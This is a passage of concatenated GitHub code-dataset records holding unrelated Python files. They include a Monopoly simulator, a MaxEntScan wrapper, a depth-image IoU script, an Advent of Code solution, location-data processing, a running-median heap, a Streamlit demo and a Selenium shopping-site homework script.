#: {t} ===')\n rollDice(p,players,board,communityCards,chanceCards)\n \n return\n\ndef jailStrategy(p, board):\n \"\"\" Applies jail rules and strategy \"\"\"\n\n payJailThreshold = 200\n d1 = random.randint(1,6)\n d2 = random.randint(1,6)\n totalRoll = d1 + d2\n doubles = (d1 == d2)\n previousLocation = p.location\n jailFee = 50\n\n\n print(f'Jail Rolls: {p.jailRolls}')\n\n # Use Get out of Jail Free card\n if(p.jailFreeCard):\n print(\"Used \\\"Get Out of Jail Free\\\" card.\")\n p.jail = False\n p.jailRolls = 0\n p.location += totalRoll\n board.loc[p.location,\"visits\"] += 1\n print(f'd1 = {d1} | d2 = {d2}')\n print(f'totalRoll = {totalRoll}')\n print(f'Prev: {previousLocation} | New: {p.location}')\n prevName = board.loc[previousLocation,'name']\n newName = board.loc[p.location,'name']\n print(f'{prevName} | {newName} ')\n return p\n # On 3rd Jail Roll\n elif(p.jailRolls == 3):\n print(\"Final Free Jail Roll.\")\n if(doubles):\n p.jail = False\n p.jailRolls = 0\n p.location += totalRoll\n board.loc[p.location,\"visits\"] += 1\n p.numDoubles += 1\n print(f'd1 = {d1} | d2 = {d2}')\n print(f'totalRoll = {totalRoll}')\n print(f'Prev: {previousLocation} | New: {p.location}')\n prevName = board.loc[previousLocation,'name']\n newName = board.loc[p.location,'name']\n print(f'{prevName} | {newName} ')\n return p\n else:\n print(\"No Doubles on 3rd Jail Row. Pay $50 fee.\")\n if(p.canPay(jailFee)):\n p.money -= 50\n p.jail = False\n p.jailRolls = 0\n p.location += totalRoll\n board.loc[p.location,\"visits\"] += 1\n print(f'd1 = {d1} | d2 = {d2}')\n print(f'totalRoll = {totalRoll}')\n print(f'Prev: {previousLocation} | New: {p.location}')\n prevName = board.loc[previousLocation,'name']\n newName = board.loc[p.location,'name']\n print(f'{prevName} | {newName} ')\n return p\n # else:\n # print(f\"Game Over for {p.name}.\")\n # p.inGame = False\n # return p\n elif(p.money <= payJailThreshold):\n if(doubles):\n print(\"JAIL - Rolled doubles! Free from Jail!\")\n p.jail = False\n p.jailRolls = 0\n p.numDoubles += 1\n p.location += totalRoll\n board.loc[p.location,\"visits\"] += 1\n print(f'd1 = {d1} | d2 = {d2}')\n print(f'totalRoll = {totalRoll}')\n print(f'Prev: {previousLocation} | New: {p.location}')\n prevName = board.loc[previousLocation,'name']\n newName = board.loc[p.location,'name']\n print(f'{prevName} | {newName} ')\n else:\n print(\"JAIL - No doubles. Turn over.\")\n board.loc[p.location,\"visits\"] += 1\n return p\n else:\n print(f\"{p.name} paid Jail Fee of $50.\")\n p.money -= jailFee\n print(p.money)\n p.jail = False\n p.jailRolls = 0\n p.location += totalRoll\n board.loc[p.location,\"visits\"] += 1\n print(f'd1 = {d1} | d2 = {d2}')\n print(f'totalRoll = {totalRoll}')\n print(f'Prev: {previousLocation} | New: {p.location}')\n prevName = board.loc[previousLocation,'name']\n newName = board.loc[p.location,'name']\n print(f'{prevName} | {newName} ')\n return p\n\ndef rollDice(p, playerList, board, communityCards, chanceCards):\n \"\"\" \n Method to simulate 3 rolling outcomes. \n 1. Two different dice = Perform action & turn over\n 2. Same dice & total # of rolls < 3 = Perform action & roll Again\n 3. Same dice & total # of rolls is 3 = Go to Jail\n \"\"\"\n\n rollCount = 1\n doubles = True\n jail = 10\n\n # Apply Jail Rules\n if(p.jail):\n p.jailRolls += 1\n p = jailStrategy(p, board)\n return\n \n while(doubles):\n # 3 straight doubles --> Go to Jail!\n if(rollCount == 3):\n print(\"Roll 3 straight doubles. Go directly to jail!\")\n p.numDoubles += 1\n p.location = jail\n p.jail = True\n board.loc[p.location,\"visits\"] += 1\n return\n\n d1 = random.randint(1,6)\n d2 = random.randint(1,6)\n \n totalRoll = d1 + d2\n previousLocation = p.location\n newLocation = previousLocation + totalRoll\n \n # If pass Go!, collect 200\n if (newLocation >= 40):\n p.money += 200\n p.location = newLocation % 40\n board.loc[p.location,\"visits\"] += 1\n # Only Possible Community Chest Space near Go\n if(p.location == 2):\n print('Community Chest Loc-2')\n p = communityChest(p, playerList, board, communityCards)\n print(f'After CC p.location = {p.location}')\n # if(p.location-2 != 0):\n # board.loc[p.location,\"visits\"] += 1\n # Only Possible Chance Space near Go\n elif(p.location == 7):\n print('Chance Loc-7')\n p = chance(p, playerList, board, chanceCards)\n print(f'new p.location = {p.location}')\n # if(p.location-7 != 0):\n # board.loc[p.location,\"visits\"] += 1\n else:\n # All non-Chance & non-Community Chest Spaces\n p.location = previousLocation + totalRoll\n board.loc[p.location,\"visits\"] += 1\n if(p.location == 30):\n p.location = jail\n p.jail = True\n board.loc[p.location,\"visits\"] += 1\n print(f'd1 = {d1} | d2 = {d2}')\n print(f'totalRoll = {totalRoll}')\n print(f'Prev: {previousLocation} | New: {p.location}')\n prevName = board.loc[previousLocation,'name']\n newName = board.loc[p.location,'name']\n print(f'{prevName} | {newName} ')\n return\n # Community Chest Spaces\n elif(p.location == 2 or p.location == 17 or p.location == 33):\n print(f'Community Chest Loc-{p.location}')\n p=communityChest(p, playerList, board, communityCards)\n print(f'After CC p.location = {p.location}')\n # if(p.location-2 != 0 or p.location-17 != 0 or p.location-33 != 0):\n # board.loc[p.location,\"visits\"] += 1\n # Chance Spaces\n elif(p.location == 7 or p.location == 22 or p.location == 36):\n print(f'Chance Loc-{p.location}')\n p=chance(p, playerList, board, chanceCards)\n print(f'After Chance p.location = {p.location}')\n # if(p.location- 7 != 0 or p.location-22 != 0 or p.location-36 != 0):\n # board.loc[p.location,\"visits\"] += 1\n\n print(f'd1 = {d1} | d2 = {d2}')\n print(f'totalRoll = {totalRoll}')\n print(f'Prev: {previousLocation} | New: {p.location}')\n prevName = board.loc[previousLocation,'name']\n newName = board.loc[p.location,'name']\n print(f'{prevName} | {newName} ')\n\n # Rolled Doubles\n if(d1 == d2):\n print(\"You rolled doubles! Go again!\\n\")\n doubles == True\n p.numDoubles += 1\n rollCount += 1\n continue\n else:\n # End of Turn\n print(\"Turn Over.\")\n doubles = False\n return\n\ndef communityChest(p, playerList, board, cards):\n \"\"\" Simulates pulling a community chess card in game \"\"\"\n\n otherPlayers = [player for player in playerList if player.name != p.name]\n \n card = cards.pop(0)\n print(card.text)\n\n if(card.category == 'money'):\n p.money += int(card.action)\n\n elif(card.category == 'moneyPlayers'):\n # Receive $10/$50 from other players\n total = 0\n for player in otherPlayers:\n player.money -= int(card.action)\n total += int(card.action)\n p.money += total\n \n elif(card.category == 'move'):\n # Go To Jail card\n if(card.id == 5):\n p.jail = True\n p.location = int(card.action)\n # Move to Go\n else:\n p.location = int(card.action)\n\n # elif(card.category == 'moneyHouses'):\n # # Pay tax for houses and hotels card\n \n elif(card.category == 'keep'):\n # Get Out of Jail Free card\n p.jailFreeCard = True\n\n cards.append(card)\n\n return p\n \ndef chance(p, playerList, board, cards):\n \"\"\" Simulates pulling a community chess card in game \"\"\"\n\n otherPlayers = [player for player in playerList if player.name != p.name]\n \n card = cards.pop(0)\n cid = card.id\n print(card.text)\n\n if(card.category == 'move'):\n # Move back 3 spaces\n if(cid == 8):\n p.location = p.location-3\n # Go to Jail\n elif(cid == 9):\n p.location = int(card.action)\n p.jail = True\n # Advanced to Boardwalk.\n elif(cid == 13):\n p.location = int(card.action)\n \n elif(card.category == 'money'):\n p.money += int(card.action)\n\n elif(card.category == 'moveGo'):\n # Advance to Go and Collect $200\n if(cid == 0):\n p.money += 200\n p.location = int(card.action) \n # Advance to Illinois Avenue\n elif(cid == 1):\n if(p.location >= 24 and p.location <= 39):\n p.money += 200\n p.location = int(card.action)\n else:\n p.location = int(card.action)\n # Advanced to St. Charles Place. Collect $200 if you pass go\n elif(cid == 2):\n if(p.location >= 11 and p.location <= 39):\n p.money += 200\n p.location = int(card.action)\n else:\n p.location = int(card.action)\n # Advance to Reading Railroad. Collect $200 if you pass go\n elif(cid == 12):\n if(p.location <= 5):\n p.location = int(card.action)\n else:\n p.money += 200\n p.location = int(card.action)\n\n elif(card.category == 'moveRailroad'):\n # Move to nearest RR\n # Pennsylvania RR\n if(p.location == 7):\n p.location = 15\n # B&O RR\n elif(p.location == 22):\n p.location = 25\n # Reading RR\n elif(p.location == 36):\n p.location = 5\n\n elif(card.category == 'moveUtility'):\n # Move to nearest Utility\n # Electric Company\n if(p.location == 7 or p.location == 36):\n p.location = 12\n # Water Works\n else:\n p.location = 28\n\n # elif(card.category == 'moneyHouses'):\n # # Pay $25 per house, $115 per hotel\n \n elif(card.category == 'keep'):\n # Get out of Jail Free card\n p.jailFreeCard = True\n\n elif(card.category == 'moneyPlayers'):\n # Pay each player $50\n totalPay = 0\n for player in otherPlayers:\n player.money += 50\n totalPay += 50\n p.money -= totalPay\n\n cards.append(card)\n\n return p\n\n# def propertyAction(location, board):\n# \"\"\" Executes action of property \"\"\"\n\n# pass\n","repo_name":"tlan2/monopoly_simulation","sub_path":"code/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":13106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73932739024","text":"\"\"\"\nThis is meant to serve as a wrapper for MaxEntScan.\n\nThe perl scripts and data files were downloaded from:\nhttp://genes.mit.edu/burgelab/maxent/download/.\n\nCommand semantics are:\n perl score5.pl fn5\n perl score3.pl fn3\n\n Here fn5 is \\n separated\n 9mers with 3 bases in the intron.\n fn3 is 23mers with 3 bases in the intron.\n\nThe main possible improvement to this tool\nwould be to provide an updated data set,\nbut I'm sure there is some subtlety in\ngetting this right.\n\"\"\"\nfrom subprocess import Popen, PIPE, STDOUT\nimport numpy as np\n\ndef maxentscan(seqs, five, BATCH = 10000):\n script = 'MaxEntScan/'\n script += 'score5.pl' if five else 'score3.pl'\n \n scores = []\n begin, end = 0, BATCH\n while end - BATCH < len(seqs):\n p = Popen(['perl', script, '-'], stdout=PIPE, stdin=PIPE)\n scores += [np.array(map(lambda x: float(x.split('\\t')[1]),\n p.communicate(input = '\\n'.join(seqs[begin:end]))[0].split('\\n')[:-1]))]\n begin = end\n end = end + BATCH\n return np.hstack(scores)\n","repo_name":"jpaggi/labranchor","sub_path":"notebooks/MaxEntScan/maxentscan.py","file_name":"maxentscan.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"17285368129","text":"import numpy as np\nimport torch\nimport os\nfrom scipy import io\nimport cv2\nimport tqdm\nimport time\n\nT_w_c_ = []\npointcloud_dir = '/home/graham/datasets/apt2/luke/pointcloud'\ndepth_dir = '/home/graham/datasets/apt2/luke/depth'\npose_dir = '/home/graham/datasets/apt2/luke/pose'\npointcloud_path = []\ndepth_img_list = []\n\nimg_width = 640\nimg_height = 480\n\nK = [[0, 0, 0] for _ in range(3)]\nK[0][0] = 572.0\nK[0][2] = 320.0\nK[1][1] = 572.0\nK[1][2] = 240.0\nK[-1][-1] = 1\nK = torch.Tensor(K).to('cuda')\n\ndepth_dir_list = os.listdir(depth_dir)\ndepth_dir_list.sort()\n# depth_dir_list = depth_dir_list[:100]\npointcloud_path = os.listdir(pointcloud_dir)\npointcloud_path.sort()\npose_dir_list = os.listdir(pose_dir)\npose_dir_list.sort()\nprint(len(pose_dir_list))\n\nstart = time.time()\n\nfor pose in pose_dir_list:\n T_w_c_.append(np.loadtxt(os.path.join(pose_dir, pose)))\nprint(len(T_w_c_))\nT_w_c_ = torch.Tensor(T_w_c_)\n\nprint(T_w_c_.shape)\nfor de_img in depth_dir_list:\n depth_img_list.append(cv2.imread(os.path.join(depth_dir, de_img), cv2.IMREAD_UNCHANGED))\ndepth_img_list = torch.Tensor(depth_img_list)\n\nend = time.time()\nprint('loading time: {:.6f}'.format(end - start))\n\ndef boundary_filter(key_points_uv):\n key_points_u = (key_points_uv[:, 0]>=0) & (key_points_uv[:, 0] < img_width)\n key_points_v = (key_points_uv[:, 1]>=0) & (key_points_uv[:, 1] < img_height)\n key_points_uv_selection = torch.where((key_points_u == True) & (key_points_v == True))\n key_points_uv_in = key_points_uv[key_points_uv_selection[0], :]\n return key_points_uv_in, key_points_uv_selection\n\ndef z_buffer_filter(depth_img_ref, key_points_uv_in, key_points_xyz_proj, key_points_uv_selection):\n key_points_xyz_proj_transpose = key_points_xyz_proj.T\n #print(\"The shape of key_points_xyz_proj is: \")\n #print(key_points_xyz_proj_transpose.shape)\n key_points_xyz_proj_transpose = key_points_xyz_proj_transpose[key_points_uv_selection[0], :]\n depth_val_proj = key_points_xyz_proj_transpose[:, 2]\n #print(\"The depth_val_proj is: \")\n #print(depth_val_proj)\n #print(\"The shape of depth_val_proj is: \")\n #print(depth_val_proj.shape)\n depth_val_ref = depth_img_ref[key_points_uv_in[:, 1], key_points_uv_in[:, 0]] / 1000.0\n depth_val_ref[depth_val_ref > 20.0] = 1e-10\n depth_val_ref[depth_val_ref == 0.0] = 1e-10\n #print(\"The depth val ref is: \")\n #print(depth_val_ref)\n #print(\"The shape of depth_val_ref is:\")\n #print(depth_val_ref.shape)\n\n depth_buffer_idx = torch.where(depth_val_ref >= (depth_val_proj - 0.05))\n #depth_buffer_idx = np.where(depth_buffer_bool == True)\n #print(\"The depth_buffter_idx is: \")\n #print(depth_buffer_idx)\n\n if len(depth_buffer_idx[0]) == 0:\n return torch.empty(size=(0, 3))\n else:\n #print(\"The key_points_uv_in is: \")\n return key_points_uv_in[depth_buffer_idx[0], :]\n\ndef image_reproject_and_show(index):\n depth_cur = depth_img_list[index].to('cuda')\n # depth_cur = depth_img_list[index].copy()\n depth_cur =depth_cur[(depth_cur > 0) & (depth_cur < 65535)]\n # color_cur = self.color_img_list[num_iter].copy()\n T_w_cur = T_w_c_[index].to('cuda')\n # key_points_xyz, key_points_uv_ = self.image_coords_ops_numpy(depth_cur)\n #key_points_xyz = cp.asnumpy(key_points_xyz)\n key_points = torch.Tensor(np.fromfile(os.path.join(pointcloud_dir, pointcloud_path[index]))).to('cuda')\n key_points_xyz = key_points.reshape(-1, 3)\n ext_c = torch.ones((key_points_xyz.shape[0], 1)).to('cuda')\n key_points_xyz = torch.hstack((key_points_xyz, ext_c)).to('cuda')\n iou_list = []\n iou_non_empty_list = []\n intersect_area = 0\n\n\n for i in range(len(depth_img_list)):\n # depth_ref = depth_img_list[i].copy()\n depth_ref = depth_img_list[i].to('cuda')\n T_w_ref = T_w_c_[i].to('cuda')\n T_ref_cur = torch.matmul(torch.linalg.inv(T_w_ref), T_w_cur)\n\n key_points_xyz_proj = torch.matmul(T_ref_cur, key_points_xyz.T).T\n key_points_xyz_idx = torch.where(key_points_xyz_proj[:, 2] > 0)\n\n if(len(key_points_xyz_idx[0]) == 0):\n intersect_area = 0\n iou_list.append(intersect_area)\n iou_non_empty_list.append(intersect_area)\n continue\n key_points_xyz_proj = key_points_xyz_proj[key_points_xyz_idx[0], :].T\n key_points_xyz_norm = (key_points_xyz_proj[0:3, :]/key_points_xyz_proj[2, :])\n\n key_points_uv_proj = torch.matmul(K, key_points_xyz_norm).T\n key_points_uv_proj = key_points_uv_proj.long()\n key_points_uv_in, key_points_uv_selection = boundary_filter(key_points_uv_proj)\n key_points_uv_in = z_buffer_filter(depth_ref, key_points_uv_in, key_points_xyz_proj, key_points_uv_selection)\n #if key_points_uv_in.shape[0] != 0:\n # key_points_uv_in = np.unique(key_points_uv_in, axis=0)\n intersect_area = key_points_uv_in.shape[0]\n depth_ref =depth_ref[(depth_ref > 0) & (depth_ref < 65535)]\n union_area = 2 * img_width * img_height - intersect_area\n union_area_non_empty = depth_cur.shape[0] + depth_ref.shape[0] - intersect_area\n iou = intersect_area / union_area\n iou_non_empty = intersect_area / union_area_non_empty\n iou_list.append(iou)\n iou_non_empty_list.append(iou_non_empty)\n #return iou_list\n #merge_img = self.key_points_show(key_points_uv_, key_points_uv_in, color_cur, color_ref, mode = \"iou\")\n #print(\"saving \" + str(i) + \" image !\")\n #cv2.imwrite(file_dir + str(i) +\".png\", merge_img)\n return np.array(iou_list), np.array(iou_non_empty_list)\n\n# data = io.loadmat('./iou_fire1_gates362_gpu.mat')\niou_matrix = []\niou_non_empty_matrix = []\n# iou_matrix = data['iou_matrix'].tolist()\n# iou_non_empty_matrix = data['iou_non_empty_matrix'].tolist()\n\naccumulate = 0\n\nfor i in tqdm.tqdm(range(len(iou_matrix), len(depth_dir_list))):\n # start = time.time()\n iou_list, iou_non_empty_list = image_reproject_and_show(i)\n iou_matrix.append(iou_list)\n iou_non_empty_matrix.append(iou_non_empty_list)\n # end = time.time()\n # diff = end - start\n # accumulate += diff\n # print('running time: {:.6f} average time: {:.6f} remain time:{:.6f}'.format(diff, accumulate / (i + 1), accumulate / (i + 1) * (len(depth_dir_list) - i - 1)))\n iou_matrix_np = np.array(iou_matrix)\n iou_non_empty_matrix_np = np.array(iou_non_empty_matrix)\n\n data = {'iou_matrix': iou_matrix_np, 'iou_non_empty_matrix':\n iou_non_empty_matrix_np}\n\n io.savemat('iou_apt2_luke_gpu.mat',data)\n","repo_name":"sikikok6/S3E-Base","sub_path":"generates/generate_ious_gpu.py","file_name":"generate_ious_gpu.py","file_ext":"py","file_size_in_byte":6531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20106618750","text":"VALS = {\"=\": -2, \"-\": -1, \"0\": 0, \"1\": 1, \"2\": 2}\nBACKVALS = {3: \"=\", 4: \"-\", 5: 0, 6: 1, 7: 2}\n\n\ndef from_SNAFU(s):\n return sum(pow(5, i) * VALS[c] for i, c in enumerate(s[::-1]))\n\n\ndef to_SNAFU(num):\n s = []\n while num:\n s.append(num % 5)\n num //= 5\n\n for i in range(len(s)):\n if s[i] >= 3:\n s[i] = BACKVALS[s[i]]\n s[i + 1] += 1\n\n return \"\".join(map(str, s[::-1]))\n\n\ndata = open(\"input.txt\", \"r\").read().strip().split()\n\ntotal = to_SNAFU(sum(from_SNAFU(line) for line in data))\nprint(\"Answer: \",total)\n","repo_name":"hgalstyan/advent-of-code-2022","sub_path":"day25/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43787207775","text":"from FullyMobile import PROJECT_ROOT\nimport random\nimport pandas as pd\nimport numpy as np\nimport geopy\nfrom matplotlib import pyplot as plt\n\ndef read_file(county_name: str):\n if county_name!= \"albemarle\" and county_name!=\"charlottesville_city\":\n print(\"Invalid County Name\")\n else:\n filename = PROJECT_ROOT/\"Data\"/f\"usa_va_{county_name}_adult_activity_location_assignment_week.csv\"\n df = pd.read_csv(filename)\n return df\n\ndef clean_data(df_day: pd.DataFrame, county_name: str):\n \n if county_name == \"charlottesville_city\":\n parameters = {\"latitude\": (38, 38.07), \"longitude\": (-78.52, -78.44)}\n elif county_name == \"albemarle\":\n parameters = {\"latitude\": (37.22, 38.28), \"longitude\": (-78.84, -78.21)}\n \n min_lat, max_lat = parameters[\"latitude\"]\n min_long, max_long = parameters[\"longitude\"]\n \n df_day.drop(df_day[(df_day[\"latitude\"]<min_lat)|(df_day[\"latitude\"]>max_lat)].index, inplace=True)\n df_day.drop(df_day[(df_day[\"longitude\"]<min_long)|(df_day[\"longitude\"]>max_long)].index, inplace=True)\n \n HOME_SHIFT=1000000000\n\n home_activities = df_day[df_day[\"activity_type\"]==1][\"lid\"]\n df_day.loc[home_activities.index, \"lid\"] += HOME_SHIFT\n \n return df_day\n\ndef get_location_directions(df: pd.DataFrame):\n return df[[\"lid\",\"longitude\", \"latitude\"]].groupby(\"lid\").mean().to_dict('index')\n\ndef find_potential_facilities(df: pd.DataFrame):\n return set(df[df[\"activity_type\"]!=1].lid)\n\ndef random_filter_spread(df:pd.DataFrame, spread = 60, random_state=42):\n \n random.seed(random_state)\n \n drop_pids = set(pid for pid in set(df.pid) if random.randint(1, spread) != 1)\n df_sparse = df.drop(df[df[\"pid\"].isin(drop_pids)].index, axis = 0)\n \n return df_sparse\n\ndef pid_hour_breakdown(df: pd.DataFrame, day: int, start_hour: int, end_hour: int):\n \n HR = 3600\n \n hour_start = day*24*HR + start_hour*HR\n hour_end = day*24*HR + end_hour*HR\n \n df[\"end_time\"] = df[\"start_time\"]+df[\"duration\"]\n \n df = df[(df[\"start_time\"]<hour_end) & (df[\"end_time\"]>hour_start)].copy()\n \n df[\"combined_loc\"] = df[[\"lid\", \"longitude\", \"latitude\", \"start_time\", \"end_time\"]].apply(\n lambda x: (int(x[\"lid\"]), (x[\"longitude\"], x[\"latitude\"]), (x[\"start_time\"], x[\"end_time\"])), axis=1)\n \n df_pid = (df.groupby(\"pid\")[\"combined_loc\"].apply(list)).apply(\n lambda x: {(i-day*24*HR)//HR: [loc for loc in x if (loc[2][0]<=i and loc[2][1]>=i+HR)] for i in range(hour_start, hour_end, HR)})\n \n return df_pid.to_frame()\n\ndef random_filter_location(df:pd.DataFrame, random_state=42):\n random.seed(random_state)\n \n df[\"condensed\"] = df[\"combined_loc\"].apply(lambda x: [(h, l[0]) for h, loc in x.items() for l in loc])\n df[\"condensed_len\"] = df[\"condensed\"].apply(lambda x: len(x))\n\n # remove clients without any location-hour assignments\n df = df.drop(list(df[df[\"condensed_len\"]==0].index))\n\n #df_selected = df[\"condensed\"].apply(lambda x: x[random.randint(0, len(x)-1)])\n\n df[\"selected\"] = df[\"condensed\"].apply(lambda x: x[random.randint(0, len(x)-1)]).to_frame()\n df[\"hr\"] = df[\"selected\"].apply(lambda x: x[0])\n\n df[\"pid\"] = df.index\n\n df[\"pid_loc\"] = df[[\"pid\",\"selected\"]].apply(lambda x: (x[\"pid\"], x[\"selected\"][1]), axis = 1)\n\n df_selected = df.groupby(\"hr\")[\"pid_loc\"].apply(list)\n\n return df_selected.to_dict({})\n\ndef get_data(county_name: str, day:int, start_hour: int, end_hour: int, random_state=42):\n\n df_full = read_file(county_name)\n df_clean = clean_data(df_full, county_name)\n\n # Must be separate since some of the activity locations are recorded as home visitations (but are not potential facility locations)\n potential_facilities = find_potential_facilities(df_clean)\n location_directory = get_location_directions(df_clean)\n\n df_sparse = random_filter_spread(df_clean, random_state=random_state)\n df_pid = pid_hour_breakdown(df_sparse, day, start_hour, end_hour)\n pid_assignment = random_filter_location(df_pid, random_state=random_state)\n\n return potential_facilities, location_directory, pid_assignment\n\n# potential_facilities, location_directory, pid_assignment = get_data(\"charlottesville_city\", 5, 6, 20)\n# potential_facilities, location_directory, pid_assignment = get_data(\"albemarle\", 5, 6, 20)\n# print(len(potential_facilities), len(location_directory), sum(len(val) for val in pid_assignment.values()))\n#print(pid_assignment[6])\n\n\"\"\"\n\nTODO:\n\nStore processed data in csv for easier access and quicker runtime\nSpeed up dataframe computations (and storage/space requirements)\nComment methods\nPotentially change datastructure\n\n\"\"\"","repo_name":"Ann924/FullyMobileFacilities","sub_path":"FullyMobile/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7003147164","text":"#!/usr/bin/env python\n\nimport sys\nfrom queue import PriorityQueue\n\n\nWRONG_MESSAGE = \"Wrong!\"\n\n\nclass HeapMultiSet(object):\n def __init__(self, prioritizer):\n self.prioritizer = prioritizer\n self.heap = PriorityQueue()\n self.counts = {}\n self.length = 0\n\n def offer(self, value):\n # Add the value to the heap if it does not exist yet.\n if (value not in self.counts or self.counts[value] <= 0):\n # Calculate a priority for the value\n priority = self.prioritizer(value)\n self.heap.put((priority, value))\n # Track the count of the value\n self.counts[value] = 0\n\n self.counts[value] += 1\n\n # Update the size of the heap\n self.length += 1\n\n def peek(self):\n if (self.heap.empty()):\n return None\n (priority, value) = self.heap.queue[0]\n return value\n\n def remove(self, value):\n if (not self.contains(value)):\n return False\n if (self.counts[value] > 0):\n self.length -= 1\n self.counts[value] = self.counts[value] - 1\n self.fix_top()\n return True\n\n def pop(self):\n if (self.heap.empty()):\n return None\n value = self.peek()\n if (self.counts[value] > 0):\n self.counts[value] -= 1\n self.length -= 1\n self.fix_top()\n return value\n\n def fix_top(self):\n while (not self.heap.empty()):\n (priority, value) = self.heap.queue[0]\n if (self.counts[value] > 0):\n break\n self.heap.get()\n\n def contains(self, value):\n return value in self.counts and self.counts[value] > 0\n\n def __len__(self):\n return self.length\n\n\nclass Median(object):\n def __init__(self):\n self.left = HeapMultiSet(lambda v: -v)\n self.right = HeapMultiSet(lambda v: v)\n\n def add(self, num):\n if (len(self.left) > len(self.right)):\n if (num >= self.left.peek()):\n self.right.offer(num)\n else:\n self.right.offer(self.left.pop())\n self.left.offer(num)\n else:\n if (len(self.right) > 0 and num >= self.right.peek()):\n self.left.offer(self.right.pop())\n self.right.offer(num)\n else:\n self.left.offer(num)\n\n def remove(self, num):\n if (len(self.left) == 0):\n return False\n\n container = self.left if (num <= self.left.peek()) else self.right\n if (not container.remove(num)):\n return False\n\n skew = len(self.left) - len(self.right)\n\n if (skew > 1):\n self.right.offer(self.left.pop())\n elif (skew < 0):\n self.left.offer(self.right.pop())\n\n return True\n\n def median(self):\n if (len(self.left) == 0):\n return None\n\n if (len(self.left) == len(self.right)):\n return (self.left.peek() + self.right.peek()) / 2\n else:\n return self.left.peek()\n\n\ndef format_result(result):\n if (result is None):\n return WRONG_MESSAGE\n elif (int(result) == result):\n return int(result)\n return result\n\n\ndef main():\n N = int(sys.stdin.readline())\n median = Median()\n while (N > 0):\n N = N - 1\n\n (op, num) = sys.stdin.readline().split(\" \")\n num = int(num)\n\n if (op == \"a\"):\n median.add(num)\n elif (op == \"r\"):\n if (not median.remove(num)):\n print(WRONG_MESSAGE)\n continue\n\n result = median.median()\n print(format_result(result))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"andreimaximov/algorithms","sub_path":"hacker-rank/data-structures/tree/median-updates/median-updates.py","file_name":"median-updates.py","file_ext":"py","file_size_in_byte":3712,"program_lang":"python","lang":"en","doc_type":"code","stars":102,"dataset":"github-code","pt":"48"} +{"seq_id":"16641922819","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\n# import matplotlib.pyplot as plt\n\nst.write(\"Hello world!\")\n\nst.title(\"Ejemplo de prueba Streamlit\")\nst.header(\"Ejemplo de header\")\nst.subheader(\"Ejemplo de subheader\")\nst.text(\"\"\"\nLorem ipsum dolor sit amet, consectetur adipiscing elit.\nSed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor.\n\"\"\")\n\nagree = st.checkbox('I agree')\nif agree:\n st.write('Great!')\n\nst.sidebar.header(\"Ejemplo de sidebar\")\n\nst.button(\"Click\")\n\nst.radio(\"Elige una opción\", [\"opción 1\", \"opción 2\"])\nst.selectbox(\"select\", [\"opción 1\", \"opción 2\"])\nst.multiselect(\"multiselect\", [\"opción 1\", \"opción 2\"])\nst.slider(\"Elige rango de precios\", 0, 100)\n\nst.text_input(\"Escribe algo\")\nst.text_area(\"Escribe algo largo\")\n\ndf = pd.DataFrame(np.random.randn(20, 2), columns=[\"a\", \"b\"])\nst.line_chart(df)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"alansastre/streamlit","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28448206385","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*- \n#====#====#====#==== \n#Author:\n#CreatDate:\n#Version: \n#====#====#====#====\n# 一.\t自动化登入电商系统后台,登入后截图 注意:网站,用户名和密码要通过代码获取\n# f=open('zl.txt','r')\n# list=f.read().splitlines()#读所有的行,返回的是列表,不带\\n\n# print(list)\n# from selenium import webdriver\n# from time import sleep\n# dr=webdriver.Firefox()\n# dr.get(list[1])\n# e=dr.find_element_by_xpath('//input[@id=\"username\"][@name=\"username\"]')\n# e.send_keys(list[4])\n# e1=dr.find_element_by_xpath('//input[@id=\"password\"][@name=\"password\"]')\n# e1.send_keys(list[7])\n# e2=dr.find_element_by_link_text('登 陆').click()\n# sleep(5)\n# dr.get_screenshot_as_file('9.9.png')\n\n# 二.\t自动化登入电商系统前台,把苹果加入到购物车 注意:网站要通过代码获取\nf=open('zl.txt','r')\nlist=f.read().splitlines()#读所有的行,返回的是列表,不带\\n\nprint(list)\nfrom selenium import webdriver\nfrom time import sleep\ndr=webdriver.Firefox()\ndr.get(list[-1])\ne=dr.find_element_by_xpath('//input[@name=\"kw\"][@class=\"fl\"]')\ne.send_keys('苹果')\nsleep(3)\n# e.submit()\nw1=dr.find_element_by_xpath('//*[@class=\"fr\"][@type=\"submit\"]').click() #点击搜索\nsleep(3)\n# e1=dr.find_element_by_xpath('//div[@class=\"gli.cut\"]/ul/li/div[@class=\"im\"]/h3/a').click() #点击苹果的链接\n# sleep(3)\nw2=dr.find_element_by_xpath('//div[@class=\"im\"]/a/img').click() #点击苹果的链接\nsleep(3)\ndr.find_element_by_xpath('//div[@class=\"buy mt30\"]/a[@class=\"add-cart icon\"]').click() #点击加入购物车\nsleep(3)\ndr.get_screenshot_as_file('04.png')\ndr.quit()\n\n","repo_name":"test202095/RMDJZZ-Website-automation-test","sub_path":"zuoye/9.9-曾小琴/9.9-作业-曾小琴.py","file_name":"9.9-作业-曾小琴.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"45122784776","text":"# For postponed evaluation of annotations\nfrom __future__ import annotations\n\nimport json\nfrom dataclasses import dataclass\nfrom datetime import date\nfrom enum import Enum\nfrom typing import Optional, Union\n\nfrom edupage_api.exceptions import ExpiredSessionException, InvalidTeacherException\nfrom edupage_api.module import Module, ModuleHelper\nfrom 